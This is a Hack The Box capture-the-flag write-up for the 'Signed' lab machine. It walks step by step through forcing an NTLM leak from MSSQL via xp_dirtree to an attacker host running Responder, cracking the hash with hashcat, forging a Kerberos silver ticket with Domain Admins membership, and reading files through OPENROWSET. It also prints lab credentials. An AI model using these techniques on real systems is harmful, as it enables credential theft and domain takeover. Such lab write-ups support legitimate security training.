HTB: Signed—Write-Up
Author: Azrael aka Marxist Hoodlum - Difficulty: Medium
Vector: MSSQL → NTLM Leak → Hashcat → Kerberos Silver Ticket → Domain Admin
Recon
nmap -sV -sC -p- 10.10.11.90
Initial Access
Log in to MSSQL with the supplied SQL credentials for scott (quote the password so the shell does not mangle it):
impacket-mssqlclient scott:'Sm230#C5NatH'@targetIP
Capture NTLM via MSSQL Outbound Authentication
Start Responder in another terminal so it answers the SMB connection the server is about to make back to you:
sudo responder -I tun0
Back in the mssqlclient session as scott, point an outbound UNC path at YOUR attacker IP. The SQL Server process (running as the service account) authenticates to your Responder listener with NTLM, which is what leaks the hash. xp_dirtree is executable by the public role by default, so the low-privilege scott login is enough. T-SQL string literals do not use backslash escaping, so the path is written with exactly two leading backslashes:
EXEC xp_dirtree '\\yourip\share';
If that does not work, try:
EXEC master..xp_fileexist '\\yourip\share\test';
If the connection goes through, you should see output like the following in the terminal where Responder is running:
SMB NTLMv2 Client: 10.10.X.X
NTLMv2 Hash Captured...
Crack Hash
Save the captured line (Responder also writes it to a file under its logs directory) to hashes.txt and run it through hashcat mode 5600 (NetNTLMv2):
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Recovered Password: purPLE9795!@
Log in as Service Account
The cracked password belongs to mssqlsvc, the domain account the SQL Server service runs as. Log in with Windows authentication this time:
impacket-mssqlclient mssqlsvc:'purPLE9795!@'@targetIP -windows-auth
Verify Privileges
SELECT IS_SRVROLEMEMBER('sysadmin');
A result of 1 means the current login is sysadmin; 0 means it is not, which is what the silver ticket below changes.
Extract NT Hash
The silver ticket needs the service account's NT hash, which is just MD4 over the UTF-16LE encoding of its password:
echo -n 'purPLE9795!@' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4 # ef699384c3285c54128a3ee1ddb1a0cc
On OpenSSL 3 hosts MD4 lives in the legacy provider, so if dgst rejects -md4 add -provider legacy -provider default to the openssl command.
Create Silver Ticket
Service tickets for the MSSQLSvc/DC01.SIGNED.HTB SPN are encrypted with the service account's key, and you now hold that key (mssqlsvc's NT hash). So you can forge a ticket for that service offline and put whatever group RIDs you like in its PAC; RID 512 is Domain Admins. The service decrypts the ticket with its own key and reads the forged group membership out of the PAC:
impacket-ticketer \
-nthash ef699384c3285c54128a3ee1ddb1a0cc \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain SIGNED.HTB \
-spn MSSQLSvc/DC01.SIGNED.HTB \
-groups 512,1105 \
-user-id 1103 \
mssqlsvc
Load & Re-Auth
In the same terminal where you ran ticketer, export the resulting cache and log in with Kerberos (-k) instead of a password. The host you connect to must match the SPN you forged, so make sure dc01.signed.htb resolves to the target (for example via /etc/hosts):
export KRB5CCNAME="$(pwd)/mssqlsvc.ccache"
impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth -no-pass
Now you should be sysadmin (SELECT IS_SRVROLEMEMBER('sysadmin'); returns 1), which is what OPENROWSET(BULK ...) needs, since it reads files from the server's own filesystem and requires the ADMINISTER BULK OPERATIONS permission. Read both flags:
User
SELECT * FROM OPENROWSET(BULK N'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;
If that does not work, use this form instead:
SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;
Root
SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS t;

